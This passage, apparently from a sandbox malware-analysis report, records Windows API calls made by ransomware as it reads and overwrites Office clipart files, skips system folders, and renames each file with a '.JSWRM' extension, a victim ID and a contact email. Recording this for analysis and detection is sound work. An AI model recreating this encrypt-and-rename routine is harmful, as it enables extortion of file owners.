GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8552) returned 1 [0077.405] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2160) returned 0x205850 [0077.405] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2160, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2160, lpOverlapped=0x0) returned 1 [0077.455] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.456] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2160, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2160, lpOverlapped=0x0) returned 1 [0077.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0077.456] CloseHandle (hObject=0x314) returned 1 [0077.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0077.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0077.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0077.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0077.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0077.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0077.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.456] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0077.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0077.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0077.457] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20e8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00382_.WMF", cAlternateFileName="")) returned 1 [0077.457] lstrcmpiW (lpString1="FD00382_.WMF", lpString2=".") returned 1 [0077.457] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="..") returned 1 [0077.457] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="...") returned 1 [0077.457] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="windows") returned -1 [0077.457] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="recovery") returned -1 [0077.457] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="perflogs") returned -1 [0077.457] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="documents and settings") returned 1 [0077.457] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.458] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="system volume information") returned -1 [0077.458] lstrcmpiW (lpString1="FD00382_.WMF", lpString2="msocache") returned -1 [0077.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0077.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00382_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00382_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00382_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0077.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0077.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00382_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00382_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00382_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0077.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0077.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0077.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0077.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.458] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8424) returned 1 [0077.458] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20e0) returned 0x205850 [0077.458] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x20e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x20e0, lpOverlapped=0x0) returned 1 [0077.460] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.460] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x20e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x20e0, lpOverlapped=0x0) returned 1 [0077.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0077.461] CloseHandle (hObject=0x314) returned 1 [0077.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0077.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0077.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0077.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0077.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0077.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0077.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.461] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0077.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0077.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0077.462] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a40, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00397_.WMF", cAlternateFileName="")) returned 1 [0077.462] lstrcmpiW (lpString1="FD00397_.WMF", lpString2=".") returned 1 [0077.462] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="..") returned 1 [0077.462] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="...") returned 1 [0077.462] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="windows") returned -1 [0077.462] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="recovery") returned -1 [0077.462] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="perflogs") returned -1 [0077.462] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="documents and settings") returned 1 [0077.462] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.462] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="system volume information") returned -1 [0077.462] lstrcmpiW (lpString1="FD00397_.WMF", lpString2="msocache") returned -1 [0077.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0077.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00397_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00397_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00397_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0077.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0077.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00397_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00397_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00397_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0077.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0077.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0077.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0077.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.463] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10816) returned 1 [0077.463] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a40) returned 0x24d210 [0077.464] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2a40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2a40, lpOverlapped=0x0) returned 1 [0077.466] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.466] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2a40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2a40, lpOverlapped=0x0) returned 1 [0077.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.466] CloseHandle (hObject=0x314) returned 1 [0077.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0077.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0077.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0077.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0077.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0077.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0077.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.466] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0077.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0077.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0077.467] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ec6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00403_.WMF", cAlternateFileName="")) returned 1 [0077.468] lstrcmpiW (lpString1="FD00403_.WMF", lpString2=".") returned 1 [0077.468] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="..") returned 1 [0077.468] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="...") returned 1 [0077.468] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="windows") returned -1 [0077.468] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="recovery") returned -1 [0077.468] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="perflogs") returned -1 [0077.468] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="documents and settings") returned 1 [0077.468] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.468] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="system volume information") returned -1 [0077.468] lstrcmpiW (lpString1="FD00403_.WMF", lpString2="msocache") returned -1 [0077.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0077.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00403_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00403_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00403_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0077.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0077.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00403_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00403_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00403_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0077.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0077.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0077.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0077.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.469] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7878) returned 1 [0077.469] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ec0) returned 0x205850 [0077.469] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ec0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ec0, lpOverlapped=0x0) returned 1 [0077.471] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.471] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ec0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ec0, lpOverlapped=0x0) returned 1 [0077.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0077.471] CloseHandle (hObject=0x314) returned 1 [0077.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0077.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0077.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, 